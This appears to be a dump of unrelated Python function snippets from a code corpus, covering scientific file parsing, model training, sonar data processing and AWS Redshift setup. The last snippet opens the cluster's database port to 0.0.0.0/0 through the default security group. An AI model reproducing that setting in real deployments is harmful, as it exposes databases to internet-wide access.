content stringlengths 22 815k | id int64 0 4.91M |
|---|---|
def detect_or_create_config(config_file, output_root, theseargs,
newname=None, logger=None):
""" return path to config file, or die trying.
if a config file exists, just return the path. If not,
create it using "make_riboSeed_config.py"
"""
assert logger is not None, "must use logging"
if not os.path.isfile(config_file):
logger.debug("creating config file")
make_config_args = Namespace(
outdir=output_root,
name=newname)
config_file = mrc.main(make_config_args)
add_these_params_to_config(config_file=config_file,
args=theseargs)
else:
logger.info("using provided config file! ignoring any other args" +
"provided via commandline")
return config_file | 5,334,200 |
def convert_to_file(genotype_input, output_file):
"""Convert a Family Tree DNA file and output GFF-formatted data to file"""
output = output_file # default assumes writable file object
if isinstance(output_file, str):
output = autozip.file_open(output_file, 'w')
conversion = convert(genotype_input)
for line in conversion:
output.write(line + "\n")
output.close() | 5,334,201 |
def gaussian(x, p):
"""
Gaussian function
@param x : variable
@param p : parameters [height, center, sigma]
"""
return p[0] * (1/np.sqrt(2*pi*(p[2]**2))) * np.exp(-(x-p[1])**2/(2*p[2]**2)) | 5,334,202 |
def get_exploration_ids_subscribed_to(user_id):
"""Returns a list with ids of all explorations that the given user
subscribes to.
WARNING: Callers of this function should ensure that the user_id is valid.
Args:
user_id: str. The user ID of the subscriber.
Returns:
list(str). IDs of all explorations that the given user
subscribes to.
"""
subscriptions_model = user_models.UserSubscriptionsModel.get(
user_id, strict=False)
return (
subscriptions_model.exploration_ids
if subscriptions_model else []) | 5,334,203 |
def JC_LAIeffective(self, k):
"""
REQUIRED INPUT:
- LAI (-)
PARAMETERS:
- none (Allen et al., 2006 & Zhou et al., 2006)
"""
self.JC_laiEff = self.LAI / (0.2 * self.LAI + 1) | 5,334,204 |
def generate_trials(olh_samples: np.array, roi_space: Space) -> list[dict]:
"""
Generates trials from the given normalized orthogonal Latin hypercube samples
Parameters
----------
olh_samples: `numpy.array`
Samples from the orthogonal Latin hypercube
roi_space: orion.algo.space.Space
Parameter space region-of-interest
Returns
-------
A list of trials as `dict` objects, each a list of parameter values in the
original search space
"""
trials = []
for sample in olh_samples:
trial_dict = {}
for j, param_name in enumerate(roi_space.keys()):
interval_min, interval_max = roi_space[param_name].interval()
# TODO: deal with categoricals
trial_dict[param_name] = (
sample[j] * (interval_max - interval_min) + interval_min
)
trials.append(trial_dict)
return trials | 5,334,205 |
def check_all_flash(matrix_2d):
"""
Check if all octopuses flashed.
:param matrix_2d: 2D matrix
:return: Boolean
"""
for line in matrix_2d:
for digit in line:
if digit != 0:
return True
return False | 5,334,206 |
def validate_content_length_header_not_too_large(
request_headers: Dict[str, str],
request_body: bytes,
) -> None:
"""
Validate the ``Content-Length`` header is not too large.
Args:
request_headers: The headers sent with the request.
request_body: The body of the request.
Raises:
ContentLengthHeaderTooLarge: The given content length header says that
the content length is greater than the body length.
"""
given_content_length = request_headers['Content-Length']
body_length = len(request_body if request_body else b'')
given_content_length_value = int(given_content_length)
if given_content_length_value > body_length:
raise ContentLengthHeaderTooLarge | 5,334,207 |
def train(request, pretrained):
"""
Train a model, and save it to disk.
"""
if pretrained:
return dash.no_update
dataset = get_dataset(request["dataset_name"])
train_set = dataset["train_set"]
val_set = dataset["val_set"]
lake_set = dataset["lake_set"]
n_classes = dataset["n_classes"]
# TODO: allow multiple examples in query set?
# TODO: allow query examples that aren't in train set (from lake, or uploaded)
trainloader = DataLoader(train_set, batch_size=TRAIN_BATCH_SIZE, shuffle=True, pin_memory=True)
valloader = DataLoader(val_set, batch_size=VAL_BATCH_SIZE, shuffle=False, pin_memory=True)
print(f"Number of labeled examples: {len(train_set)}. Number of unlabeled examples: {len(lake_set)}")
result_dict = {}
model = get_model(request["model_name"], n_classes, DEVICE, EMBEDDING_TYPE)
optimizer = get_optimizer(model)
criterion = nn.CrossEntropyLoss()
# Get the initial model by training
# In the future, we may choose to save the initial model to disk.
print("Beginning training")
for i_epoch in range(EPOCHS_PER_ROUND):
model.train()
for inputs, targets in trainloader:
inputs, targets = inputs.to(DEVICE), targets.to(DEVICE, non_blocking=True)
optimizer.zero_grad()
outputs = model(inputs)
loss = criterion(outputs, targets)
loss.backward()
optimizer.step()
# TODO: Add some kind of progress bar or accuracy display for responsiveness
# TODO: Report initial train/val accuracy for plotting
print("Training done")
# Save trained model to disk
model_path = os.path.join("models/", request["dataset_name"], request["model_name"])
os.makedirs(model_path, exist_ok=True)
model_path = os.path.join(model_path, "saved.pth")
torch.save(model, model_path)
# Compute values for logging (train/val accuracy)
with torch.no_grad():
model.eval()
for loader, name in [(trainloader, "train"), (valloader, "val")]:
examples_total = 0
examples_correct = 0
for inputs, targets in loader:
inputs, targets = inputs.to(DEVICE), targets.to(DEVICE, non_blocking=True)
outputs = model(inputs)
_, predicted = outputs.max(1)
examples_total += targets.size(0)
examples_correct += predicted.eq(targets).sum().item()
result_dict[name + "_accuracy"] = examples_correct/examples_total
return dash.no_update | 5,334,208 |
def test_create_programs_without_revise(data_dir: str):
"""Tests creating programs without revise calls.
It should not use refer calls even with a valid salience model.
"""
utterance_tokenizer = UtteranceTokenizer()
salience_model = VanillaSalienceModel()
for trade_dialogue in load_test_trade_dialogues(data_dir):
for avoid_empty_plan in [True, False]:
_, num_refer_calls, _ = create_programs_for_trade_dialogue(
trade_dialogue=trade_dialogue,
keep_all_domains=True,
remove_none=False,
fill_none=False,
salience_model=salience_model,
no_revise=True,
avoid_empty_plan=avoid_empty_plan,
utterance_tokenizer=utterance_tokenizer,
)
assert num_refer_calls == 0 | 5,334,209 |
async def async_setup_entry(hass, config_entry, async_add_devices):
"""Add sensors for passed config_entry in HA."""
wind = hass.data[DOMAIN][config_entry.entry_id]
new_devices = []
for windturbine in wind.windturbines:
new_devices.append(PulsingSensor(windturbine))
if new_devices:
async_add_devices(new_devices) | 5,334,210 |
def cache_get(cache, key, fcn, force=False):
"""Get key from cache, or compute one."""
if cache is None:
cache = {}
if force or (key not in cache):
cache[key] = fcn()
return cache[key] | 5,334,211 |
def savefig(path):
"""matplotlib.savefig"""
plt.savefig(path) | 5,334,212 |
def _BreadthFirstSearch(to_visit, children, visited_key=lambda x: x):
"""Runs breadth first search starting from the nodes in |to_visit|
Args:
to_visit: the starting nodes
children: a function which takes a node and returns the nodes adjacent to it
visited_key: a function for deduplicating node visits. Defaults to the
identity function (lambda x: x)
Returns:
A list of nodes which are reachable from any node in |to_visit| by calling
|children| any number of times.
"""
to_visit = list(to_visit)
seen = set(map(visited_key, to_visit))
for node in to_visit:
for child in children(node):
key = visited_key(child)
if key not in seen:
seen.add(key)
to_visit.append(child)
return to_visit | 5,334,213 |
def readfq(fp): # this is a generator function
"""
FASTA/Q parser from Heng Li:
https://github.com/lh3/readfq/blob/master/readfq.py
"""
last = None # this is a buffer keeping the last unprocessed line
while True: # mimic closure; is it a bad idea?
if not last: # the first record or a record following a fastq
for l in fp: # search for the start of the next record
if l[0] in '>@': # fasta/q header line
last = l[:-1] # save this line
break
if not last: break
name, seqs, last = last[1:].partition(" ")[0], [], None
for l in fp: # read the sequence
if l[0] in '@+>':
last = l[:-1]
break
seqs.append(l[:-1])
if not last or last[0] != '+': # this is a fasta record
yield name, ''.join(seqs), None # yield a fasta record
if not last: break
else: # this is a fastq record
seq, leng, seqs = ''.join(seqs), 0, []
for l in fp: # read the quality
seqs.append(l[:-1])
leng += len(l) - 1
if leng >= len(seq): # have read enough quality
last = None
yield name, seq, ''.join(seqs); # yield a fastq record
break
if last: # reach EOF before reading enough quality
yield name, seq, None # yield a fasta record instead
break | 5,334,214 |
def get_receptor_from_receptor_ligand_model(receptor_ligand_model):
"""
This function obtains the name of receptor based on receptor_ligand_model
Example of input: compl_ns3pro_dm_0_-_NuBBE_485_obabel_3D+----+20
"""
separator_model = get_separator_filename_mode()
separator_receptor = "_-_"
string_ref = receptor_ligand_model
receptor_name = string_ref.split(separator_receptor)[0] #Removing all, except receptor name
return receptor_name | 5,334,215 |
def build_model():
"""
Selects the best model with optimal parameters
"""
pipeline = Pipeline([
('vect', CountVectorizer(tokenizer=tokenize)),
('svd', TruncatedSVD()),
('tfidf', TfidfTransformer()),
('clf', MultiOutputClassifier(RandomForestClassifier(class_weight='balanced')))
])
parameters = {'clf__estimator__n_estimators': [25, 50],
'clf__estimator__max_depth': [10, 25]}
cv_rf = GridSearchCV(pipeline, parameters)
return cv_rf | 5,334,216 |
def monthly_expenses(costs, saleprice, propvalue, boyprincipal, rent):
"""Calculate monthly expenses
costs list of MonthlyCost objects
saleprice sale price of the property
propvalue actual value of the property
boyprincipal principal at beginning of year to calculate for
rent projected monthly rent for the property
"""
expenses = []
if not costs:
return expenses
# deepcopy the costs during *every* iteration,
# or else we keep doing expenses.append(cost) on the same cost each time
for cost in copy.deepcopy(costs):
# First, check our inputs
if cost.calctype == costconfig.CostCalculationType.DOLLAR_AMOUNT and cost.value is None:
raise Exception(
f"The {cost.label} MonthlyCost calctype is DOLLAR_AMOUNT, "
"but with an empty value property")
elif (
cost.calctype is not costconfig.CostCalculationType.DOLLAR_AMOUNT and
cost.calc is None):
raise Exception(
f"The {cost.label} MonthlyCost calctype is {cost.calctype}, "
"but with an empty calc property")
# Now calculate what can be calculated now
# Don't calculate LOAN_FRACTION or INTEREST_MONTHS calctypes here,
# because any PRINCIPAL paytypes will affect their value
if cost.calctype is costconfig.CostCalculationType.DOLLAR_AMOUNT:
pass
elif cost.calctype is costconfig.CostCalculationType.YEARLY_PRINCIPAL_FRACTION:
cost.value = boyprincipal * cost.calc / mmath.MONTHS_IN_YEAR
elif cost.calctype is costconfig.CostCalculationType.SALE_FRACTION:
cost.value = saleprice * cost.calc
elif cost.calctype is costconfig.CostCalculationType.VALUE_FRACTION:
cost.value = propvalue * cost.calc
elif cost.calctype is costconfig.CostCalculationType.MONTHLY_RENT_FRACTION:
cost.value = rent * cost.calc
elif cost.calctype is costconfig.CostCalculationType.CAPEX:
cost.value = cost.calc.monthly
else:
raise NotImplementedError(
f"Cannot process a cost with a calctype of {cost.calctype}")
# logger.info(f"Calculating monthy expense: {cost}")
expenses.append(cost)
return expenses | 5,334,217 |
def test_reg_user_cannot_view_user_dne(reg_user_headers):
""" regular user cannot view user that doesn't exist """
org = reg_user_headers['CVE-API-ORG']
user = str(uuid.uuid4())
res = requests.get(
f'{env.AWG_BASE_URL}{ORG_URL}/{org}/user/{user}',
headers=reg_user_headers
)
assert res.status_code == 404
response_contains_json(res, 'error', 'USER_DNE') | 5,334,218 |
def get_spitfire_template_class(prefer_c_extension=True):
"""Returns an appropriate SpitfireTemplate class.
Args:
prefer_c_extension: If set True and _template loaded properly, use the
C extension's baseclass implementation.
Returns:
A SpitfireTemplate class with an appropriate base class.
"""
if prefer_c_extension and _template is not None:
baseclass = _template.BaseSpitfireTemplate
else:
baseclass = _BaseSpitfireTemplate
class _SpitfireTemplate(baseclass):
# store a reference to the filter function - this is tricky because of
# some python stuff. filter functions look like this:
#
# def filter_function(template_instance, value):
#
# when this is assigned to a template instance, accessing this name
# binds the function to the current instance. using the name
# 'template_instance' to indicate that these functions aren't really
# related to the template.
_filter_function = staticmethod(filters.simple_str_filter)
repeat = None
placeholder_cache = None
def __init__(self,
search_list=None,
default_filter=None,
use_placeholder_cache=False):
# use_placeholder_cache - cache the values returned from the
# search_list? The cached values will live for the lifetime of
# this object.
self.search_list = search_list
if use_placeholder_cache:
self.placeholder_cache = {}
if default_filter is not None:
self._filter_function = default_filter
# FIXME: repeater support is not needed most of the time, just
# disable it for the time being
# self.repeat = spitfire.runtime.repeater.RepeatTracker()
def get_var(self, name, default=None):
return udn.resolve_from_search_list(self.search_list, name, default)
def has_var(self, name):
var = self.get_var(name, default=runtime.UnresolvedPlaceholder)
return var is not runtime.UnresolvedPlaceholder
@staticmethod
def new_buffer():
return BufferIO()
return _SpitfireTemplate | 5,334,219 |
def _create_player_points(
pool: pd.DataFrame,
teams: np.ndarray,
n_iterations: int,
n_teams: int,
n_players: int,
team_points: np.ndarray
) -> np.ndarray:
"""Calculates playerpoints
Args:
pool (pd.DataFrame): the player pool
statscols (Iterable[str]): the statistics columns
teams (np.ndarray): the teams
Returns:
np.ndarray
"""
# now need to link back to players
players = pool.index.values
# once we've calculated stats, can remove league dimension from teams
# is just a 2D array of teams
# if you flatten teampoints, get 1D array lines up with 2D teams
teams2d = teams.reshape(n_iterations * n_teams, n_players)
team_points1d = team_points.ravel()
# creates array of shape (len(teams2d), len(players))
# is effectively one hot encoder for player indexes
# if player index 3 is on team 0, then on_team[0, 3] == 1
on_team = (players[...,None]==teams2d[:,None,:]).any(-1).astype(int)
# now we can calculate player points by multiplying
# matrix of zeroes and ones with team points
return on_team * team_points1d[:, np.newaxis] | 5,334,220 |
def generate_system_exe_funcs():
""" Generates the functions needed to process the `System`s. """
max_parameters = 30
path = "./systems/system_exe_funcs.gen.h"
internal_generate_system_exe_funcs(False, max_parameters, path) | 5,334,221 |
def get_SolverSettings(instance):
""" get solver settings """
instance.sSolver = ""
instance.dicPyomoOption = {}
instance.dicSolverOption = {}
file_setting = "../Input/1_model_config/01_SolverConfig.csv"
dt_data = genfromtxt(file_setting, dtype = str, skip_header=0, delimiter=',')
for sSetting in dt_data:
if sSetting[0] == "Solver":
instance.sSolver = sSetting[2]
elif sSetting[0] == "Pyomo options" and sSetting[3] == "1":
instance.dicPyomoOption[sSetting[1]] = sSetting[2]
elif sSetting[0] == "Solver options" and sSetting[3] == "1":
instance.dicSolverOption[sSetting[1]] = sSetting[2]
return instance | 5,334,222 |
def on_reported(client, userdata, message):
"""
*Callback function parses a FireReported message, switches FireState from "detected" to "reported", and records time of first report, name of satellite reporting the fire, and groundId receiving the report*
.. literalinclude:: /../examples/firesat/fires/main_fire.py
:lines: 84-92
"""
for index, observer in enumerate(app.simulator._observers):
if isinstance(observer, Environment):
app.simulator._observers[index].on_reported(client, userdata, message) | 5,334,223 |
def demod_from_array(mod_array, faraday_sampling_rate = 5e6, start_time = 0, end_time = 'max', reference_frequency = 736089.8, reference_phase_deg = 0, lowpas_freq = 10000, plot_demod = False, decimate_factor = 4, time_stamp = '', label = '', save = False):
"""
Sweet lord above this function washes the dishes as well. In summary it opens a h5
file, in the same directory as the file, extracts data according to specified
directory and then demodulates. Demodulation requires phase and frequency to be
entered. After this is decimates the data, done to upload into limited memory of
and arbitary waveform generator. Along the way there are options to plot graphs
in order to check outputs. It returns the decimated waveform in a numpy array.
Arguments;
h5file_name - Name of the h5 file data is being loaded from
h5data_path - Path in the h5 file to the data
faraday_sampling_rate - Sampling rate the data was recorded at
start_time - Selecting the start time of the data in the h5 file after which data will
be data
end_time - Selecting the end time of the data before which data will be included. Enter 'max' for
the entire array
reference_frequency - Frequency of the reference waveform used for demodulation
reference_phase_deg - Phase of the reference waveform used for demodulation.
lowpas_freq - frequency of the lowpass filter. May be the 6db point, don't know.
plot_demod - Plots a figure of the demodulated data
decimate_factor - Multiple for decimating the data.
"""
""" Creating the reference """
Faraday_clipped = mod_array
dt = 1/faraday_sampling_rate
time_axis = np.arange(len(Faraday_clipped))*dt
# Decimate input data to help filter behave better
# Faraday_clipped = signal.decimate(Faraday_clipped, 100, n=None, ftype='iir', axis=-1, zero_phase=True)
# time_axis = signal.decimate(time_axis, 100, n=None, ftype='iir', axis=-1, zero_phase=True)
# dt = 1/faraday_sampling_rate
reference = np.sin(2*np.pi*reference_frequency*time_axis + reference_phase_deg*np.pi/180)
decimate_factor = 10
""" Multiplying Faraday with reference and lowpassing """
multiplied_waves = np.multiply(Faraday_clipped, reference)
# Decimate input data for LPFilter
# NOTE: decimated fector must be under a factor of 13, so to get 100 we do 10 twice
dec_data = signal.decimate(multiplied_waves, decimate_factor, n=None, ftype='iir', axis=-1, zero_phase=True)
dec_dec_data = signal.decimate(dec_data, decimate_factor, n=None, ftype='iir', axis=-1, zero_phase=True)
# dec_time = signal.decimate(time_axis, decimate_factor, n=None, ftype='iir', axis=-1, zero_phase=True)
# dec_dec_time = signal.decimate(dec_time, decimate_factor, n=None, ftype='iir', axis=-1, zero_phase=True)
demod_time = np.arange(len(dec_dec_data))*dt*decimate_factor*decimate_factor
# Feed into Low pass filter
demodulated = LPFilter(dec_dec_data, lowpas_freq, dt*decimate_factor*decimate_factor)
""" Figures to check demodulation """
fNameDemod = str(time_stamp) + '_Fx_demodulated'
if plot_demod == True:
plt.figure(4, figsize = (10,7.5))
# plt.plot(time_axis, multiplied_waves, label = label)
plt.plot(demod_time, demodulated, label = label)
plt.xlabel('Time (s)')
plt.ylabel('Demodulated <Fx>')
# plt.xlim(time_axis[0], time_axis[-1])
plt.title(fNameDemod)
plt.grid()
if save is True:
path = 'C:/Users/Boundsy/Desktop/Uni Work/PHS2360/Sim Results/' + str(fNameDemod) + '.png'
print('Demodulated Fx plot saved to Sim Results folder')
plt.savefig(path)
fNamePeriodogram = str(time_stamp) + '_demod_periodogram'
freq, amp = make_periodogram(demodulated, faraday_sampling_rate/100, fNamePeriodogram, saveFig = save, plot_graph = plot_demod, start_freq = 0, end_freq = 20000, label = label)
""" decimating data """
# decimated_demod = signal.decimate(demodulated, 100, n=None, ftype='iir', axis=-1, zero_phase=True)
# return decimated_demod
return demodulated | 5,334,224 |
def listen(path, calfile=None, transitspeed=3,
platform='Unknown', savepng=False, reportrows=10, recipient=None):
"""
Listen for new raw files. When find a new one, it carries out the following
actions:
1) Read RAW data
2) Process RAW data (calibration, de-noising and target identification)
3) Report (summarise and deliver results)
Results are stored in log/.
Args:
path (str) : Path to the directory where the RAW files
are copied by the echosounder.
calfile (str) : Path to the calibration file.
transitspeed (int, float): Minimum speed to consider the platform in
transit and proceed to process data (knots).
platform (str) : Platform name.
savepng (bool) : Whether or not you want to save a PNG images
showing processsed echograms.
reportrows (int) : number of rows in table reports.
recipient (str) : recipient email to receive results.
"""
# Check if recipient email has been provided
if recipient is None:
raise Exception('Need to provide a recipient email address')
# Report path being listened
logger.info('Listening at %s...', path)
# List preceeding RAW files in the directory
r = re.compile('.*raw$')
pre = [f for f in os.listdir(path) if r.match(f, re.IGNORECASE)]
pre.sort()
# Preallocate variables and loop forever
logname = datetime.datetime.now().strftime('D%Y%m%d-T%H%M%S')
preraw = None
rawpile = None
alr = []
t = '\n\t\t\t\t\t > '
lastrow = 0
while 1:
# List cumulated RAW files in the directory (preceeding + newcomers)
time.sleep(10)
cum = [f for f in os.listdir(path) if r.match(f, re.IGNORECASE)]
cum.sort()
# Report of "No new files", if cumulated and preeceding are equal
if len(cum)==len(pre):
logger.info('No new files')
# Reset list of preeceding files, if files have been deleted
if len(cum)<len(pre):
logger.warning('Files have been deleted!')
pre = cum.copy()
# Identify new files as the difference between cumulated and preceeding
if len(cum)>len(pre):
new = cum.copy()
for filename in pre:
new.remove(filename)
# Identify repeated files (already processed but incoming again)
rep = list(set(new) & set(alr))
if len(rep)>0:
rep.sort()
rep.insert(0, 'Inconming files already processed:')
logger.warning(t.join(rep))
rep.remove('Inconming files already processed:')
for filename in rep:
new.remove(filename)
pre.append(filename)
pre=list(set(pre))
# Report list of new files pending to be processed
if len(new)>0:
new.insert(0, 'Files pending:')
if len(new)>3:
logger.info(t.join(new[:3]+['+ '+str(len(new)-3)+' more']))
else:
logger.info(t.join(new))
new.remove('Files pending:')
# If more than one new file, try to process the first one
if (len(new))>1:
try:
# Move file name to preceeding & already-processed lists
pre.append(new[0])
alr.append(new[0])
# Read RAW
rawfile = os.path.join(path, new[0])
raw = read.raw(rawfile, transitspeed=transitspeed,
calfile=calfile, preraw=preraw)
preraw = raw.copy()
# If raw data is continuous with preceeding data...
if raw['continuous']:
# pile up current raw data in the rawpile
if rawpile is not None:
rawpile = read.join(rawpile, raw)
# or start a new rawpile if not created yet
else:
rawpile = raw.copy()
# Start a new rawpile if raw is not continuous
else:
rawpile = raw.copy()
prepro = None
jdx = [0,0]
# Process rawpile if vessels is moving...
if rawpile['transect']>0:
# Process rawpile if it's got at least 1 nmi...
if rawpile['nm'][-1]-rawpile['nm'][0]>1:
pro = process.ccamlr(rawpile,prepro=prepro,jdx=jdx)
# Report results
report.console(pro)
report.log(pro, logname, savepng=savepng)
try:
lastrow = report.land(logname, lastrow,
reportrows,
platform=platform,
recipient=recipient)
except Exception:
logger.error('Failed to send report',exc_info=True)
prepro = rawpile
jdx = process.next_jdx(pro)
rawpile = None
# or report it hasn't got 1 nmi yet
else:
logger.info('Processing pending: at least ' +
'1 nmi required')
# or report the vessel is not moving, and reset parameters
else:
logger.info('Processing skipped: ' +
'platform not in transit')
rawpile = None
prepro = None
jdx = [0,0]
# free up memory RAM
if 'raw' in locals(): del raw
if 'pro' in locals(): del pro
gc.collect()
# log error if process fails and reset rawpile
except Exception:
logger.error('Failed to process file', exc_info=True)
rawpile = None | 5,334,225 |
def test_provider_system_hook_dicts_merge(change_dir, clean_outputs):
"""Verify the hook call works properly."""
output = tackle('.', context_file='merge.yaml', no_input=True)
assert output['merge_map']['stuff'] == 'blah'
assert len(output['merge_map']) == 3 | 5,334,226 |
async def test_dimmable_light(hass):
"""Test dimmable light discovery."""
device = (
'light.test_2', 'on', {
'brightness': 128,
'friendly_name': "Test light 2", 'supported_features': 1
})
appliance = await discovery_test(device, hass)
assert appliance['endpointId'] == 'light#test_2'
assert appliance['displayCategories'][0] == "LIGHT"
assert appliance['friendlyName'] == "Test light 2"
assert_endpoint_capabilities(
appliance,
'Alexa.BrightnessController',
'Alexa.PowerController',
)
properties = await reported_properties(hass, 'light#test_2')
properties.assert_equal('Alexa.PowerController', 'powerState', 'ON')
properties.assert_equal('Alexa.BrightnessController', 'brightness', 50)
call, _ = await assert_request_calls_service(
'Alexa.BrightnessController', 'SetBrightness', 'light#test_2',
'light.turn_on',
hass,
payload={'brightness': '50'})
assert call.data['brightness_pct'] == 50 | 5,334,227 |
def find_many_files_gridrad(
top_directory_name, radar_field_names, radar_heights_m_agl,
start_time_unix_sec, end_time_unix_sec, one_file_per_time_step=True,
raise_error_if_all_missing=True):
"""Finds many files with storm-centered images from GridRad data.
T = number of "file times"
If `one_file_per_time_step = True`, T = number of time steps
Else, T = number of SPC dates
F = number of radar fields
H = number of radar heights
:param top_directory_name: Name of top-level directory for storm-centered
images.
:param radar_field_names: length-F list with names of radar fields.
:param radar_heights_m_agl: length-H numpy array of radar heights (metres
above ground level).
:param start_time_unix_sec: See doc for `find_many_files_myrorss_or_mrms`.
:param end_time_unix_sec: Same.
:param one_file_per_time_step: Same.
:param raise_error_if_all_missing: Same.
:return: file_dict: Dictionary with the following keys.
file_dict['image_file_name_matrix']: T-by-F-by-H numpy array of paths to
image files.
file_dict['valid_times_unix_sec']: length-T numpy array of valid times. If
`one_file_per_time_step = False`, valid_times_unix_sec[i] is just a time
within the [i]th SPC date.
file_dict['radar_field_names']: Same as input.
file_dict['radar_heights_m_agl']: Same as input.
"""
error_checking.assert_is_numpy_array(
numpy.array(radar_field_names), num_dimensions=1
)
for this_field_name in radar_field_names:
radar_utils.check_field_name(this_field_name)
error_checking.assert_is_numpy_array(radar_heights_m_agl, num_dimensions=1)
error_checking.assert_is_geq_numpy_array(radar_heights_m_agl, 0)
radar_heights_m_agl = numpy.round(radar_heights_m_agl).astype(int)
error_checking.assert_is_boolean(one_file_per_time_step)
error_checking.assert_is_boolean(raise_error_if_all_missing)
if one_file_per_time_step:
all_times_unix_sec = time_periods.range_and_interval_to_list(
start_time_unix_sec=start_time_unix_sec,
end_time_unix_sec=end_time_unix_sec,
time_interval_sec=GRIDRAD_TIME_INTERVAL_SEC, include_endpoint=True)
good_indices = numpy.where(numpy.logical_and(
all_times_unix_sec >= start_time_unix_sec,
all_times_unix_sec <= end_time_unix_sec
))[0]
all_times_unix_sec = all_times_unix_sec[good_indices]
all_spc_date_strings = [
time_conversion.time_to_spc_date_string(t)
for t in all_times_unix_sec
]
else:
first_spc_date_string = time_conversion.time_to_spc_date_string(
start_time_unix_sec)
last_spc_date_string = time_conversion.time_to_spc_date_string(
end_time_unix_sec)
all_spc_date_strings = time_conversion.get_spc_dates_in_range(
first_spc_date_string=first_spc_date_string,
last_spc_date_string=last_spc_date_string)
all_times_unix_sec = numpy.array([
time_conversion.spc_date_string_to_unix_sec(s)
for s in all_spc_date_strings
], dtype=int)
file_dict = {
RADAR_FIELD_NAMES_KEY: radar_field_names,
RADAR_HEIGHTS_KEY: radar_heights_m_agl
}
image_file_name_matrix = None
valid_times_unix_sec = None
valid_spc_date_strings = None
num_fields = len(radar_field_names)
num_heights = len(radar_heights_m_agl)
for j in range(num_fields):
for k in range(num_heights):
print((
'Finding storm-image files for "{0:s}" at {1:d} metres AGL...'
).format(
radar_field_names[j], radar_heights_m_agl[k]
))
if j == 0 and k == 0:
image_file_names = []
valid_times_unix_sec = []
valid_spc_date_strings = []
for i in range(len(all_times_unix_sec)):
if one_file_per_time_step:
this_time_unix_sec = all_times_unix_sec[i]
else:
this_time_unix_sec = None
this_file_name = find_storm_image_file(
top_directory_name=top_directory_name,
unix_time_sec=this_time_unix_sec,
spc_date_string=all_spc_date_strings[i],
radar_source=radar_utils.GRIDRAD_SOURCE_ID,
radar_field_name=radar_field_names[j],
radar_height_m_agl=radar_heights_m_agl[k],
raise_error_if_missing=False)
if not os.path.isfile(this_file_name):
continue
image_file_names.append(this_file_name)
valid_times_unix_sec.append(all_times_unix_sec[i])
valid_spc_date_strings.append(all_spc_date_strings[i])
num_times = len(image_file_names)
if num_times == 0:
if raise_error_if_all_missing:
if one_file_per_time_step:
start_time_string = (
time_conversion.unix_sec_to_string(
start_time_unix_sec, TIME_FORMAT)
)
end_time_string = (
time_conversion.unix_sec_to_string(
end_time_unix_sec, TIME_FORMAT)
)
error_string = (
'Cannot find any files from {0:s} to {1:s}.'
).format(start_time_string, end_time_string)
raise ValueError(error_string)
error_string = (
'Cannot find any files from SPC dates "{0:s}" to '
'"{1:s}".'
).format(
all_spc_date_strings[0], all_spc_date_strings[-1]
)
raise ValueError(error_string)
file_dict.update({
IMAGE_FILE_NAMES_KEY: None, VALID_TIMES_KEY: None
})
return file_dict
image_file_name_matrix = numpy.full(
(num_times, num_fields, num_heights), '', dtype=object
)
image_file_name_matrix[:, j, k] = numpy.array(
image_file_names, dtype=object)
valid_times_unix_sec = numpy.array(
valid_times_unix_sec, dtype=int)
else:
for i in range(len(valid_times_unix_sec)):
if one_file_per_time_step:
this_time_unix_sec = valid_times_unix_sec[i]
else:
this_time_unix_sec = None
image_file_name_matrix[i, j, k] = find_storm_image_file(
top_directory_name=top_directory_name,
unix_time_sec=this_time_unix_sec,
spc_date_string=valid_spc_date_strings[i],
radar_source=radar_utils.GRIDRAD_SOURCE_ID,
radar_field_name=radar_field_names[j],
radar_height_m_agl=radar_heights_m_agl[k],
raise_error_if_missing=True)
file_dict.update({
IMAGE_FILE_NAMES_KEY: image_file_name_matrix,
VALID_TIMES_KEY: valid_times_unix_sec
})
return file_dict | 5,334,228 |
def cli_num_postproc_workers(
usage_help: str = "Number of workers to post-process the network output.",
default: int = 0,
) -> callable:
"""Enables --num-postproc-workers option for cli."""
return click.option(
"--num-postproc-workers",
help=add_default_to_usage_help(usage_help, default),
type=int,
default=default,
) | 5,334,229 |
def create_cluster(redshift, iam, ec2, cluster_config, wait_status=False):
""" Create publicly available redshift cluster per provided cluster configuration.
:param redshift: boto.redshift object to use
:param iam: boto.iam object to use
:param ec2: boto.ec2 object to use
:param cluster_config: configparser cluster configuration, from manage_cluster.cfg file
:param wait_status: bool, default is False. Should function wait and repeatedly check if cluster has
reached its desired state.
:return: Returns JSON, if successful, otherwise displays error and returns integer 1
"""
print("Attempting to create a new IAM Role")
iam_role_name = cluster_config['iam_role_name']
try:
iam.create_role(
Path='/',
RoleName=iam_role_name,
Description="Allows Redshift clusters to call AWS services on your behalf.",
AssumeRolePolicyDocument=json.dumps({
'Statement': [
{
'Action': 'sts:AssumeRole',
'Effect': 'Allow',
'Principal': {
'Service': 'redshift.amazonaws.com'
}
}
],
'Version': '2012-10-17'
})
)
print(f"Role '{iam_role_name}' created")
except iam.exceptions.EntityAlreadyExistsException:
print("Role already exists")
print("Attaching AmazonS3ReadOnlyAccess policy to the role")
iam.attach_role_policy(
RoleName=iam_role_name,
PolicyArn="arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess"
)
print("Retrieving role ARN")
aws_role_arn = iam.get_role(RoleName=cluster_config['iam_role_name'])['Role']['Arn']
print(f"Role ARN: {aws_role_arn}")
try:
redshift.create_cluster(
# HW
ClusterType=cluster_config['cluster_type'],
NodeType=cluster_config['node_type'],
NumberOfNodes=int(cluster_config['num_nodes']),
# Identifiers & Credentials
DBName=cluster_config['db_name'],
ClusterIdentifier=cluster_config['cluster_identifier'],
MasterUsername=cluster_config['db_user'],
MasterUserPassword=cluster_config['db_password'],
# Roles (for s3 access)
IamRoles=[aws_role_arn]
)
except Exception as e:
print(f"ERROR: {e}")
return 1
if wait_status:
expected_status = 'available'
else:
expected_status = None
cluster_info = get_cluster_status(
redshift,
cluster_config['cluster_identifier'],
expected_status=expected_status
)
print(f"DWH_ENDPOINT :: {cluster_info['Endpoint']['Address']}")
print(f"DWH_ROLE_ARN :: {cluster_info['IamRoles'][0]['IamRoleArn']}")
vpc_id = cluster_info['VpcId']
vpc_cidr_ip = '0.0.0.0/0'
vpc_ip_proto = 'TCP'
vpc_port = int(cluster_config['db_port'])
try:
vpc = ec2.Vpc(id=vpc_id)
default_sec_group = list(vpc.security_groups.all())[0]
print(default_sec_group)
default_sec_group.authorize_ingress(
GroupName=default_sec_group.group_name,
CidrIp=vpc_cidr_ip,
IpProtocol=vpc_ip_proto,
FromPort=vpc_port,
ToPort=vpc_port
)
print(f"VPC {vpc_id} access has been granted to {vpc_ip_proto} {vpc_cidr_ip} "
f"for port {vpc_port}")
except Exception as e:
print(f"ERROR: {e}")
